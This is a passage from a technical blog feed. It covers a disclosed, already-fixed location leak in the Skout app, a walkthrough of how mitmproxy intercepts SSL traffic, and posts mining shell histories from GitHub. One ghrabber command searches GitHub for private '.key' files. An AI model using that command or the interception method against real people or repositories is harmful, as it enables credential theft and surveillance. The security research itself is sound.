href="skout-map.png"> <img src="skout-map.png" /> </a> </div> <p>I used <a rel="external" href="http://mitmproxy.org">mitmproxy</a> to observe Skout's traffic, but because the request is unencrypted any tool that allows you to inspect network traffic would be enough. The result is a stalker's wet dream - click on an anonymous profile, watch your network traffic, and find out exactly where the victim lives. I've also seen minors located at malls where they hang out, and at their schools... Given the scale of Skout's userbase and the ease with which the data can be obtained, I think there's a high likelihood that this issue has already been used for unsavoury purposes.</p> <p>I reported the vulnerability to Skout on the 24th of May. I'm happy to report that they immediately realised the seriousness of the situation, and their API stopped returning exact lat/long values a few hours later. Subsequent correspondence with Niklas Lindstrom, Skout's CTO, confirmed that they were taking steps to tighten security. I've encouraged Skout to speak about this publicly - their userbase needs to know about the issue, and need to be reassured that action is being taken to ensure that this type of privacy breach won't ever recur.</p> How mitmproxy works 2013-05-16T00:00:00+00:00 2013-05-16T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/howitworks/ <p>I started work on <a rel="external" href="http://mitmproxy.org">mitmproxy</a> because I was frustrated with the available interception tools. I had a long list of minor complaints - they were insufficiently flexible, not programmable enough, mostly written in Java (a language I don't enjoy), and so forth. My most serious problem, though, was opacity. The best tools were all closed source and commercial. SSL interception is a complicated and delicate process, and after a certain point, not understanding precisely what your proxy is doing just doesn't fly.</p> <p>The text below is now part of the <a rel="external" href="http://mitmproxy.org/doc/index.html">official documentation</a> of mitmproxy. It's a detailed description of mitmproxy's interception process, and is more or less the overview document I wish I had when I first started the project. I proceed by example, starting with the simplest unencrypted explicit proxying, and working up to the most complicated interaction - transparent proxying of SSL-protected traffic<sup class="footnote-reference"><a href="#ssl">1</a></sup> in the presence of <a rel="external" href="http://en.wikipedia.org/wiki/Server_Name_Indication">SNI</a>.</p> <h2 id="explicit-http">Explicit HTTP</h2> <p>Configuring the client to use mitmproxy as an explicit proxy is the simplest and most reliable way to intercept traffic. The proxy protocol is codified in the <a rel="external" href="http://www.ietf.org/rfc/rfc2068.txt">HTTP RFC</a>, so the behaviour of both the client and the server is well defined, and usually reliable. In the simplest possible interaction with mitmproxy, a client connects directly to the proxy and makes a request that looks like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>GET http://example.com/index.html HTTP/1.1</span></span></code></pre> <p>This is a proxy GET request - an extended form of the vanilla HTTP GET request that includes a schema and host specification, and it includes all the information mitmproxy needs to relay the request upstream.</p> <div class="media"> <a href="explicit.png"> <img src="explicit.png" /> </a> </div><table class="table"> <tbody> <tr> <td><b>1</b></td> <td>The client connects to the proxy and makes a request.</td> </tr> <tr> <td><b>2</b></td> <td>Mitmproxy connects to the upstream server and simply forwards the request on.</td> </tr> </tbody> </table> <h2 id="explicit-https">Explicit HTTPS</h2> <p>The process for an explicitly proxied HTTPS connection is quite different. The client connects to the proxy and makes a request that looks like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>CONNECT example.com:443 HTTP/1.1</span></span></code></pre> <p>A conventional proxy can neither view nor manipulate an SSL-encrypted data stream, so a CONNECT request simply asks the proxy to open a pipe between the client and server. The proxy here is just a facilitator - it blindly forwards data in both directions without knowing anything about the contents. The negotiation of the SSL connection happens over this pipe, and the subsequent flow of requests and responses are completely opaque to the proxy.</p> <h3 id="the-mitm-in-mitmproxy">The MITM in mitmproxy</h3> <p>This is where mitmproxy's fundamental trick comes into play. The MITM in its name stands for Man-In-The-Middle - a reference to the process we use to intercept and interfere with these theoretically opaque data streams. The basic idea is to pretend to be the server to the client, and pretend to be the client to the server, while we sit in the middle decoding traffic from both sides. The tricky part is that the <a rel="external" href="http://en.wikipedia.org/wiki/Certificate_authority">Certificate Authority</a> system is designed to prevent exactly this attack, by allowing a trusted third-party to cryptographically sign a server's SSL certificates to verify that they are legit. If this signature doesn't match or is from a non-trusted party, a secure client will simply drop the connection and refuse to proceed. Despite the many shortcomings of the CA system as it exists today, this is usually fatal to attempts to MITM an SSL connection for analysis. Our answer to this conundrum is to become a trusted Certificate Authority ourselves. Mitmproxy includes a full CA implementation that generates interception certificates on the fly. To get the client to trust these certificates, we <a rel="external" href="http://mitmproxy.org/doc/ssl.html">register mitmproxy as a trusted CA with the device manually</a>.</p> <h3 id="complication-1-what-s-the-remote-hostname">Complication 1: What's the remote hostname?</h3> <p>To proceed with this plan, we need to know the domain name to use in the interception certificate - the client will verify that the certificate is for the domain it's connecting to, and abort if this is not the case. At first blush, it seems that the CONNECT request above gives us all we need - in this example, both of these values are "example.com". But what if the client had initiated the connection as follows:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>CONNECT 10.1.1.1:443 HTTP/1.1</span></span></code></pre> <p>Using the IP address is perfectly legitimate because it gives us enough information to initiate the pipe, even though it doesn't reveal the remote hostname.</p> <p>Mitmproxy has a cunning mechanism that smooths this over - <a rel="external" href="http://mitmproxy.org/doc/features/upstreamcerts.html">upstream certificate sniffing</a>. As soon as we see the CONNECT request, we pause the client part of the conversation, and initiate a simultaneous connection to the server. We complete the SSL handshake with the server, and inspect the certificates it used. Now, we use the Common Name in the upstream SSL certificates to generate the dummy certificate for the client. Voila, we have the correct hostname to present to the client, even if it was never specified.</p> <h3 id="complication-2-subject-alternative-name">Complication 2: Subject Alternative Name</h3> <p>Enter the next complication. Sometimes, the certificate Common Name is not, in fact, the hostname that the client is connecting to. This is because of the optional <a rel="external" href="http://en.wikipedia.org/wiki/SubjectAltName">Subject Alternative Name</a> field in the SSL certificate that allows an arbitrary number of alternative domains to be specified. If the expected domain matches any of these, the client will proceed, even though the domain doesn't match the certificate Common Name. The answer here is simple: when extract the CN from the upstream cert, we also extract the SANs, and add them to the generated dummy certificate.</p> <h3 id="complication-3-server-name-indication">Complication 3: Server Name Indication</h3> <p>One of the big limitations of vanilla SSL is that each certificate requires its own IP address. This means that you couldn't do virtual hosting where multiple domains with independent certificates share the same IP address. In a world with a rapidly shrinking IPv4 address pool this is a problem, and we have a solution in the form of the <a rel="external" href="http://en.wikipedia.org/wiki/Server_Name_Indication">Server Name Indication</a> extension to the SSL and TLS protocols. This lets the client specify the remote server name at the start of the SSL handshake, which then lets the server select the right certificate to complete the process.</p> <p>SNI breaks our upstream certificate sniffing process, because when we connect without using SNI, we get served a default certificate that may have nothing to do with the certificate expected by the client. The solution is another tricky complication to the client connection process. After the client connects, we allow the SSL handshake to continue until just <em>after</em> the SNI value has been passed to us. Now we can pause the conversation, and initiate an upstream connection using the correct SNI value, which then serves us the correct upstream certificate, from which we can extract the expected CN and SANs.</p> <p>There's another wrinkle here. Due to a limitation of the SSL library mitmproxy uses, we can't detect that a connection <em>hasn't</em> sent an SNI request until it's too late for upstream certificate sniffing. In practice, we therefore make a vanilla SSL connection upstream to sniff non-SNI certificates, and then discard the connection if the client sends an SNI notification. If you're watching your traffic with a packet sniffer, you'll see two connections to the server when an SNI request is made, the first of which is immediately closed after the SSL handshake. Luckily, this is almost never an issue in practice.</p> <h3 id="putting-it-all-together">Putting it all together</h3> <p>Lets put all of this together into the complete explicitly proxied HTTPS flow.</p> <div class="media"> <a href="explicit_https.png"> <img src="explicit_https.png" /> </a> </div><table class="table"> <tbody> <tr> <td><b>1</b></td> <td>The client makes a connection to mitmproxy, and issues an HTTP CONNECT request.</td> </tr> <tr> <td><b>2</b></td> <td>Mitmproxy responds with a 200 Connection Established, as if it has set up the CONNECT pipe.</td> </tr> <tr> <td><b>3</b></td> <td>The client believes it's talking to the remote server, and initiates the SSL connection. It uses SNI to indicate the hostname it is connecting to.</td> </tr> <tr> <td><b>4</b></td> <td>Mitmproxy connects to the server, and establishes an SSL connection using the SNI hostname indicated by the client.</td> </tr> <tr> <td><b>5</b></td> <td>The server responds with the matching SSL certificate, which contains the CN and SAN values needed to generate the interception certificate.</td> </tr> <tr> <td><b>6</b></td> <td>Mitmproxy generates the interception cert, and continues the client SSL handshake paused in step 3.</td> </tr> <tr> <td><b>7</b></td> <td>The client sends the request over the established SSL connection.</td> </tr> <tr> <td><b>7</b></td> <td>Mitmproxy passes the request on to the server over the SSL connection initiated in step 4.</td> </tr> </tbody> </table> <h2 id="transparent-http">Transparent HTTP</h2> <p>When a transparent proxy is used, the HTTP/S connection is redirected into a proxy at the network layer, without any client configuration being required. This makes transparent proxying ideal for those situations where you can't change client behaviour - proxy-oblivious Android applications being a common example.</p> <p>To achieve this, we need to introduce two extra components. The first is a redirection mechanism that transparently reroutes a TCP connection destined for a server on the Internet to a listening proxy server. This usually takes the form of a firewall on the same host as the proxy server - <a rel="external" href="http://www.netfilter.org/">iptables</a> on Linux or <a rel="external" href="http://en.wikipedia.org/wiki/PF_(firewall)">pf</a> on OSX. Once the client has initiated the connection, it makes a vanilla HTTP request, which might look something like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>GET /index.html HTTP/1.1</span></span></code></pre> <p>Note that this request differs from the explicit proxy variation, in that it omits the scheme and hostname. How, then, do we know which upstream host to forward the request to? The routing mechanism that has performed the redirection keeps track of the original destination for us. Each routing mechanism has a different way of exposing this data, so this introduces the second component required for working transparent proxying: a host module that knows how to retrieve the original destination address from the router. In mitmproxy, this takes the form of a built-in set of <a rel="external" href="https://github.com/cortesi/mitmproxy/tree/master/libmproxy/platform">modules</a> that know how to talk to each platform's redirection mechanism. Once we have this information, the process is fairly straight-forward.</p> <div class="media"> <a href="transparent.png"> <img src="transparent.png" /> </a> </div><table class="table"> <tbody> <tr> <td><b>1</b></td> <td>The client makes a connection to the server.</td> </tr> <tr> <td><b>2</b></td> <td>The router redirects the connection to mitmproxy, which is typically listening on a local port of the same host. Mitmproxy then consults the routing mechanism to establish what the original destination was.</td> </tr> <tr> <td><b>3</b></td> <td>Now, we simply read the client's request...</td> </tr> <tr> <td><b>4</b></td> <td>... and forward it upstream.</td> </tr> </tbody> </table> <h2 id="transparent-https">Transparent HTTPS</h2> <p>The first step is to determine whether we should treat an incoming connection as HTTPS. The mechanism for doing this is simple - we use the routing mechanism to find out what the original destination port is. By default, we treat all traffic destined for ports 443 and 8443 as SSL.</p> <p>From here, the process is a merger of the methods we've described for transparently proxying HTTP, and explicitly proxying HTTPS. We use the routing mechanism to establish the upstream server address, and then proceed as for explicit HTTPS connections to establish the CN and SANs, and cope with SNI.</p> <div class="media"> <a href="transparent_https.png"> <img src="transparent_https.png" /> </a> </div><table class="table"> <tbody> <tr> <td><b>1</b></td> <td>The client makes a connection to the server.</td> </tr> <tr> <td><b>2</b></td> <td>The router redirects the connection to mitmproxy, which is typically listening on a local port of the same host. Mitmproxy then consults the routing mechanism to establish what the original destination was.</td> </tr> <tr> <td><b>3</b></td> <td>The client believes it's talking to the remote server, and initiates the SSL connection. It uses SNI to indicate the hostname it is connecting to.</td> </tr> <tr> <td><b>4</b></td> <td>Mitmproxy connects to the server, and establishes an SSL connection using the SNI hostname indicated by the client.</td> </tr> <tr> <td><b>5</b></td> <td>The server responds with the matching SSL certificate, which contains the CN and SAN values needed to generate the interception certificate.</td> </tr> <tr> <td><b>6</b></td> <td>Mitmproxy generates the interception cert, and continues the client SSL handshake paused in step 3.</td> </tr> <tr> <td><b>7</b></td> <td>The client sends the request over the established SSL connection.</td> </tr> <tr> <td><b>7</b></td> <td>Mitmproxy passes the request on to the server over the SSL connection initiated in step 4.</td> </tr> </tbody> </table> <div class="footnote-definition" id="ssl"><sup class="footnote-definition-label">1</sup> <p>I use "SSL" to refer to both SSL and TLS in the generic sense, unless otherwise specified.</p> </div> pathod 0.9 2013-05-16T00:00:00+00:00 2013-05-16T00:00:00+00:00 https://corte.si/posts/code/pathod/announce0_9/ <p>I've just released <a rel="external" href="http://pathod.net">pathod 0.9</a>, my toolset for crafting malicious and interesting HTTP traffic. Apart from the usual range of stability improvements and bugfixes, this release introduces a major new set of features: proxy support. <a rel="external" href="http://pathod.net/docs/pathoc">Pathoc</a>, the client, has sprouted support for vanilla proxy connections, and is also able to tunnel through proxies using CONNECT. <a rel="external" href="http://pathod.net/docs/pathod">Pathod</a>, the server, will now respond to proxy requests as well as straight HTTP, and will treat CONNECT requests as SSL with on-the-fly generation of dummy certificates.</p> <p>The Pathod changes in particular open a whole new range of possibilities for fuzzing and other mischief. Any client with proxy support can be directed at Pathod, which can then impersonate the upstream server and return the creatively malicious response of your choice.</p> <p>There have also been some organizational changes. This is the first release based on <a rel="external" href="http://github.com/cortesi/netlib">netlib</a>, the gonzo networking library pathod now shares with <a rel="external" href="http://mitmproxy.org">mitmproxy</a>. Over the next while, pathod and mitmproxy will move closer together. As a sign of this, the major version numbers between these projects are now synchronized.</p> mitmproxy 0.9 2013-05-15T00:00:00+00:00 2013-05-15T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_9/ <div class="media"> <a href="mitmproxy_0_9.png"> <img src="mitmproxy_0_9.png" /> </a> </div> <p>I'm happy to announce the release of <a rel="external" href="http://mitmproxy.org">mitmproxy 0.9</a>. This is a major release, with huge improvements to mitmproxy pretty much across the board. So much has happened in the year since the last release that it's difficult to pick out the headlines. Mitmproxy is now faster, more scalable, and works in more tricky corner cases than ever before. Full transparent mode support has landed for both Linux and OSX. Content decoding is much nicer, with a slew of new targets like <a rel="external" href="http://en.wikipedia.org/wiki/Action_Message_Format">AMF</a> and <a rel="external" href="https://code.google.com/p/protobuf/">Protocol Buffers</a>. We now have a WSGI container that allows you to host web apps right in the proxy. In addition to this, there is a myriad of new features, bugfixes and other small improvements.</p> <p>There are also changes afoot in the project itself. As a first step, I've moved mitmproxy from the GPLv3 to an MIT license. I hope that this will make it easier for people to use the project in more contexts. Keep an eye out for more changes along these lines soon, geared to broadening participation in the project.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Upstream certs mode is now the default.</li> <li>Add a WSGI container that lets you host in-proxy web applications.</li> <li>Full transparent proxy support for Linux and OSX.</li> <li>Introduce netlib, a common codebase for <a rel="external" href="http://github.com/cortesi/netlib">mitmproxy and pathod</a>.</li> <li>Full support for SNI.</li> <li>Color palettes for mitmproxy, tailored for light and dark terminal backgrounds.</li> <li>Stream flows to file as responses arrive with the "W" shortcut in mitmproxy.</li> <li>Extend the filter language, including ~d domain match operator, ~a to match asset flows (js, images, css).</li> <li>Follow mode in mitmproxy ("F" shortcut) to "tail" flows as they arrive.</li> <li>--dummy-certs option to specify and preserve the dummy certificate directory.</li> <li>Server replay from the current captured buffer.</li> <li>Huge improvements in content views. We now have viewers for AMF, HTML, JSON, Javascript, images, XML, URL-encoded forms, as well as hexadecimal and raw views.</li> <li>Add Set Headers, analogous to replacement hooks. Defines headers that are set on flows, based on a matching pattern.</li> <li>A graphical editor for path components in mitmproxy.</li> <li>A small set of standard user-agent strings, which can be used easily in the header editor.</li> <li>Proxy authentication to limit access to mitmproxy</li> </ul> Google, destroyer of ecosystems 2013-03-14T00:00:00+00:00 2013-03-14T00:00:00+00:00 https://corte.si/posts/socialmedia/rip-google-reader/ <p>Google has finally shut down a service I actually care about - <a rel="external" href="http://googlereader.blogspot.co.nz/2013/03/powering-down-google-reader.html">Google Reader will die a graceless, undignified death on July 1, 2013</a>. The only way Google could inconvenience me more would be to shut down search itself, and yet - I'm not angry that Google is shutting Reader down. I'm furious that they ever entered the RSS game at all. Consider this quote from a TechCrunch <a rel="external" href="http://techcrunch.com/2006/01/10/searchfox-to-shut-down/">article in January 2006</a>. Here, Michael Arrington ends an article about the shutdown of a feed reader service with a statement that seems truly bizarre today:</p> <blockquote> <p>The RSS reader space is becoming hyper competitive, with dozens of different choices for readers.</p> </blockquote> <p>A hyper competitive space with dozens of choices? Reader made its first public appearance a couple of months before this, in October 2005. I remember this period well - it was a time of immense excitement, when RSS seemed to be the future, the news ecosystem was vibrant, and this thing called the blogosphere, fueled by peer subscription, was doubling in size every six months. It was into this magic garden that Google wandered, like a giant toddler leaving destruction in its wake. Reader was undeniably a good product, but it's best quality was also its worst: it was free. Subsidized by Google's immense search profits, it never had to earn its keep, and its competitors started to die. Over time, the "hyper competitive" RSS reader market turned into a monoculture. Today, on the eve of its shutdown, RSS more or less means "Google Reader" to a large fraction of readers, to the extent where even the best feed readers on IOS are just Google Reader clients<sup class="footnote-reference"><a href="#1">1</a></sup>.</p> <p>The sudden shock of Reader's closure will harm a news ecosystem that I <a href="https://corte.si/posts/socialmedia/trouble-with-social-news/">already believe to be deeply ill</a>. Google Reader is not just a core part of my information diet - it's also the most direct channel I have to readers of this blog. As of today, the Reader subscriber count for <a rel="external" href="http://corte.si">corte.si</a> stands at about 3 times the total number of other subscribers combined. Some of these readers will migrate to other services and stay in touch, but many will inevitably abandon the idea of direct subscription to blogs entirely. In the next few months, tens of thousands of small blogs will lose direct contact with a large fraction of their readers.</p> <p>The truth is this: Google destroyed the RSS feed reader ecosystem with a subsidized product, stifling its competitors and killing innovation. It then neglected Google Reader itself for years, after it had effectively become the only player. Today it does further damage by buggering up the already beleaguered links between publishers and readers. It would have been better for the Internet if Reader had never been at all.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>Yes, I'm aware that there are a few hardy outliers still playing in this place. My own logs show that their reach is insignificant, though, and when I tried to shift my subscriptions about a year ago, there was nothing as good as Reader itself. Once <a rel="external" href="http://www.newsblur.com">NewsBlur's</a> servers have recovered, I definitely plan to give it another shot.</p> </div> Things I found on GitHub: aspell custom dictionary entries 2013-02-26T00:00:00+00:00 2013-02-26T00:00:00+00:00 https://corte.si/posts/hacks/github-spellingdicts/ <p>I've been doing a series of posts looking at data gathered with <a rel="external" href="https://github.com/cortesi/ghrabber">ghrabber</a>, a simple tool I wrote that lets you grab files matching a search specification from GitHub. Last week, I looked at <a href="https://corte.si/posts/hacks/github-shhistory/">shell history</a> in the broad, and then specifically at <a href="https://corte.si/posts/hacks/github-pipechains/">pipe chains</a>. Today, I move on to something different - custom <a rel="external" href="http://aspell.net/">aspell</a> dictionaries. When aspell finds a word it doesn't recognize, the user is prompted to correct it, ignore it, or add it to a custom dictionary so that it will be recognized as correct in future. These words are written to the user's custom dictionary - a file named <strong>.aspell_en_pw</strong> that lives in the user's home directory. It turns out that 30 people have checked aspell dictionaries into GitHub, containing a total of 9501 custom words. The chart below shows the top 50 words, with the X-axis showing the percentage of files the word appeared in.</p> <div class="media"> <a href="aspell.png"> <img src="aspell.png" /> </a> </div> <p>There were a few requests for the raw data behind the previous two posts, so this time round you can also <a href="https://corte.si/posts/hacks/github-spellingdicts/./aspell-all.csv">download a CSV file</a> with the occurrence totals for each word in the dataset.</p> Things I found on GitHub: pipe chains 2013-02-22T00:00:00+00:00 2013-02-22T00:00:00+00:00 https://corte.si/posts/hacks/github-pipechains/ <p>Earlier this week I published <a rel="external" href="https://github.com/cortesi/ghrabber">ghrabber</a>, a simple tool that lets you grab files matching an arbitrary search specification from GitHub. I used ghrabber to retrieve all the bash_history and zsh_history files accidentally checked in to repos, and took <a rel="external" href="http://corte.si/posts/hacks/github-shhistory/index.html">a light look at the dataset with some simple graphs</a>. In total, I obtained 234 shell history files with 165k individual command entries. This is a very rare opportunity to "shoulder-surf", to actually see what people <em>do</em> at the command prompt, and perhaps get some insights into how to improve things.</p> <p>Along those lines, today's post looks at pipe chains - that is, compound commands that pipe the output of one command to another. The pipe operator lies at the core of the Unix command-line philosophy. The fact that we can easily compose complex operations is the reason why we are able to write small tools that "do one thing well" without losing generality. The shell history data on Github can give us some real data about what people do with composed commands, and how they do it.</p> <div class="media"> <a href="pipechains.png"> <img src="pipechains.png" /> </a> </div> <p>It turns out that about 2% of all commands issued on the command-line use pipes. The graph above shows the prevalence the most common pipe chains - that is, what percentage of the user in my sample used each chain. There's a lot of fascinating stuff we can read straight from this image.</p> <p>Starting at the top, the first thing we notice is how widely used the <strong>ps | grep</strong> chain is. About 17% of users in my sample used this chain - given the type of data we have, the real-world prevalence would surely be higher still. I've just been extolling the virtues of small tools and composability, but in this case practicality should beat purity. I suggest that everyone should have a command-alias similar to this in their shell configuration:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">alias</span><span> pg</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;ps aux | grep&quot;</span></span></code></pre> <p>I've added this to my .zshrc today, and I've already used it twice.</p> <p>Next up, we have the <strong>ls | grep</strong> pipes. The vast majority of uses here could actually be accomplished using the shell's filename generation mechanism. This ranges from simple redundancies like grepping for file extensions, to performing quite complex matching operations that could be done using the shell's advanced glob operations. I'm guilty of this myself - I rarely use features like recursive globbing, expansions using character ranges, case insensitive globbing, and so forth. I've brushed up on <a rel="external" href="http://linux.die.net/man/1/zshexpn">filename expansion for my chosen shell</a>, and perhaps you should too.</p> <p>The last thing I want to point out is a pattern that's genuinely dangerous - <strong>curl | bash</strong>, along with its cousins <strong>curl | sh</strong> and <strong>wget | sh</strong>. Unfortunately, this has become the recommended installation pattern for some tool - the vast majority of invocations here are for <a rel="external" href="https://rvm.io/">RVM</a> and <a rel="external" href="http://yeoman.io/">Yeoman</a>. I don't think it's a good idea to pipe anything from the web straight into a local shell, but the situation is made particularly dire by the fact that almost half of these invocations are either over plain HTTP or explicitly turn certificate validation off.</p> <p>I'll stop here, although there are interesting things to say about nearly every entry in the graph above. Next week, I'll move on from the shell history sample, look at some other juicy datasets extracted using ghrabber.</p> Things I found on GitHub: shell history 2013-02-19T00:00:00+00:00 2013-02-19T00:00:00+00:00 https://corte.si/posts/hacks/github-shhistory/ <p>Github recently introduced hugely <a rel="external" href="https://github.com/blog/1381-a-whole-new-code-search">improved code search</a>, one of those rare moments when a service I use adds a feature that directly and measurably measurably improves my life. Predictably, there was soon a <a rel="external" href="http://www.webmonkey.com/2013/01/users-scramble-as-github-search-exposes-passwords-security-details/">flurry</a> <a rel="external" href="http://www.scmagazine.com.au/News/330152,passwords-ssh-keys-exposed-on-github.aspx">of</a> <a rel="external" href="http://arstechnica.com/security/2013/01/psa-dont-upload-your-important-passwords-to-github/">breathless</a> stories about the security implications. This shouldn't have been news to anyone - by now, it should be clear that better search in almost any context has security or privacy implications, a law of the universe almost as solid as the second law of thermodynamics. We saw this with <a rel="external" href="http://www.securityfocus.com/news/11417">Google's own code search</a>, as well as <a rel="external" href="http://en.wikipedia.org/wiki/Google_hacking">Google proper</a>, Facebook's <a rel="external" href="http://actualfacebookgraphsearches.tumblr.com/">Graph Search</a> and even <a rel="external" href="http://www.wired.com/wiredenterprise/2013/02/microsoft-bing-fights-botnets/">Bing</a>. A certain fraction of people will always make mistakes, and and any sufficiently powerful search will allow bad guys to find and take advantage of the outliers.</p> <p>After the dust had settled a bit I started wondering what else we could do with Github's search - other than snookering schmucks who checked in their private keys. I'm always enticed by data, and the combination of search and the ability to download raw checked-in files seemed like a promising avenue to explore. Lets see what we can come up with.</p> <h2 id="ghrabber-grab-files-from-github"><a rel="external" href="https://github.com/cortesi/ghrabber">ghrabber</a> - grab files from GitHub</h2> <p>First, some tooling. I've just released ghrabber, a simple tool that lets you grab all files matching a search specification from GitHub. Here, for instance, is an obvious wheeze - fetching all files with the extension ".key":</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">./ghrabber.py</span><span style="color: #032F62;"> &quot;extension:key&quot;</span></span></code></pre> <p>Downloaded files are saved locally to files named <strong>user.repository</strong>. Existing files with the same name are skipped, which means that you can reasonably efficiently stop and resume a ghrab.</p> <h2 id="shell-history-files">Shell history files</h2> <p>I've been having a lot of fun exploring Github with ghrabber. I'll return to this in future posts - today I'll start with a quick illustration of what can be done. One type of difficult-to-find information that is sometimes checked in to repos is shell history. Two simple ghrabber commands for the two most popular shells is all we need:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">./ghrabber.py</span><span style="color: #032F62;"> &quot;path:.bash_history&quot;</span></span></code></pre> <p>and</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">./ghrabber.py</span><span style="color: #032F62;"> &quot;path:.zsh_history&quot;</span></span></code></pre> <p>After cleaning the data a bit, I had 234 history files varying in length from 1 line to just over 10 thousand, containing a total of 165k entries. I fed this into <a rel="external" href="http://pandas.pydata.org/">Pandas</a> for analysis, parsing each command using a combination of hand-hacked heuristics and the built-in <a rel="external" href="http://docs.python.org/2/library/shlex.html">shlex</a> module. The remainder of this post is a light exploration of some approaches to this dataset, steering clear of the obvious and tediously well-covered security implications.</p> <div class="media"> <a href="topcmds.png"> <img src="topcmds.png" /> </a> </div> <p>One way to slice the data is to look at the percentage of history files a given command appears in. This gives us a nice listing of the top commands by user prevalence, which you can see in the graph on the left above. On the right, I've taken the same list of commands, and checked how many invocations are preceded by a <strong>man</strong> lookup for the command. This gives us an idea of which commonly-used commands have difficult or unintuitive interfaces. It's interesting that <strong>ln</strong> is right at the top of the list, considering how simple the command syntax is. My theory is that everyone forgets the order of the source and target files.</p> <div class="media"> <a href="editors.png"> <img src="editors.png" /> </a> </div><div class="media"> <a href="tmuxes.png"> <img src="tmuxes.png" /> </a> </div> <p>Since we have a list of the most widely used commands, it's also trivial to do silly popularity comparisons. Above is the obvious look at the state of the editor wars (vim is winning, folks), and a check on how <a rel="external" href="http://tmux.sourceforge.net/">tmux</a> is doing in supplanting screen (the faster the better).</p> <p><div class="media"> <a href="args-ssh.png"> <img src="args-ssh.png" /> </a> </div> <div class="media"> <a href="args-mkdir.png"> <img src="args-mkdir.png" /> </a> </div> <div class="media"> <a href="args-rm.png"> <img src="args-rm.png" /> </a> </div> <div class="media"> <a href="args-ls.png"> <img src="args-ls.png" /> </a> </div></p> <p>Another interesting thing to do is to look at the most commonly used flags to commands. I think having "real data" of command use may well guide us to design better command-line interfaces. I'd love to know the most common invocation flags for some of the tools I write.</p> <p>I'll stop there. The data pool in this case is very deep, and there are a huge range of interesting bits of command-line ethnography that could be done. Stay posted for more in the coming weeks.</p> The trouble with social news 2013-01-24T00:00:00+00:00 2013-01-24T00:00:00+00:00 https://corte.si/posts/socialmedia/trouble-with-social-news/ <p>There is something terribly awry with the social news ecosystem. This is a feeling that's been growing on me over the last few years, and is the reason why I've cut both <a rel="external" href="http://reddit.com">Reddit</a> and <a rel="external" href="http://news.ycombinator.com">Hacker News</a> (who together constitute pretty much all of "social news") out of my information diet. Although I've mulled over things in various conversations, I've never actually tried to put my feeling of unease in writing, until today. What's spurring me into action is a <a rel="external" href="http://yann.lecun.com/ex/pamphlets/publishing-models.html">proposal by Yann LeCun</a> that a model similar to social news be adopted for scientific peer review - self-assembled Reviewing Entities voting on streams of submitted papers, regulated by a reputation system for authors and reviewers. Basically, this is science a la Reddit: complete with subreddits, karma and upboats. I find the idea frankly terrifying.</p> <p>I guess it's time, then, to put finger to keyboard and lay out what disquiets me about social news.</p> <h2 id="karma-corrupts">Karma Corrupts</h2> <p>You start by introducing a reputation mechanism like <a rel="external" href="http://www.reddit.com/wiki/faq#toc_9">karma</a> to improve some outcome - say, to increase the quality of comments, or to apply a threshold to restrict voting to trustworthy community members. This seems like a plausible and even elegant mechanism at first, until you discover the terrible side-effects.</p> <p>Humans are fundamentally status-seeking social apes, and you've now introduced a visible measure of social worth that people will be driven to maximize. In the real world, we have a word for those who spend their lives accumulating karma - we call them politicians. And so, within karma communities, we see the rise of a political class - persuasive centrists who cater (perhaps unconsciously) to a constituency, and who express (perhaps eloquently) opinions calculated to appeal to the masses and avoid controversy. Hacker News and many subreddits are dominated by people like this, whose comments are largely predictable and rarely add anything new or unexpected to the conversation.</p> <p>At the bottom end of the food chain, we have a different class of creature with the same basic aim as the politicians, but without the persuasive charm needed to pull off the political approach. These are the karma whores, who use a mixture of frank pandering, provocation and calculated outrage to achieve the same aims.</p> <p>The karma maximization game often acts contrary to the goals we aimed to achieve by introducing karma in the first place: the tenor of the community suffers, the diversity of opinion declines, and the karma whores post pictures of their cats everywhere.</p> <h2 id="the-lossy-sieve">The Lossy Sieve</h2> <p>Go and have a look at the <a rel="external" href="http://news.ycombinator.com/newest">new story submission queue</a> on Hacker News. Scroll through a few pages, and pay attention to the stories stuck at one vote - they will most likely never receive another upvote and will die in obscurity. Now, go look at the <a rel="external" href="http://news.ycombinator.com/">front page</a>. When I do this exercise I'm struck by the fact that there's plenty of crap on the front page, and quite a bit of good stuff in the submission queue languishing in obscurity. So, quality can't be the sole metric here - what determines what gets onto the front page and what doesn't?</p> <p>Lets try a thought experiment. First, set up a small number of voting accounts - say, 10 or so. Now, in the new submission queue, pick 5 random stories every hour, and give them a small number of upvotes soon after they are submitted. I predict that you will find that stories that received this small initial boost are vastly more likely to end up on the front page. If I'm right, then chance dominates story selection - as long as an article exceeds some basic quality threshold, it all depends on who happens to see the story soon after it is submitted, and whether the spirit moves them to vote. Note that this is not the case at the extremes - frankly bad content won't be upvoted, and really important stories will usually find their way to the top. The lossy sieve phenomenon affects everything in between.</p> <p>What this boils down to is that social news doesn't provide an effective filter - good content gets lost, and mediocre content finds its way onto our screens.</p> <h2 id="the-pinhole-effect">The Pinhole Effect</h2> <p>In social news, the front page is king. Most users never go beyond the first or second page of top stories. However, front-page real estate is incredibly limited compared to the volume of submissions on most popular subreddits and on Hacker News. The effect of this is that we're looking at a fast-flowing river of information through a pinhole. Even assuming that the selection mechanism works flawlessly, what you see on the front page is a small sliver of the total, chosen through a consensus mechanism that takes no account of individual variation in tastes and interests. The news you see is not tailored to <em>you</em> - it's tailored to some abstract, average participant, with all the rough edges of individuality smoothed away. The effect of this is that even at its best, the stories that emerge from the social news system feel like a predictable pablum dished up by the hivemind. The 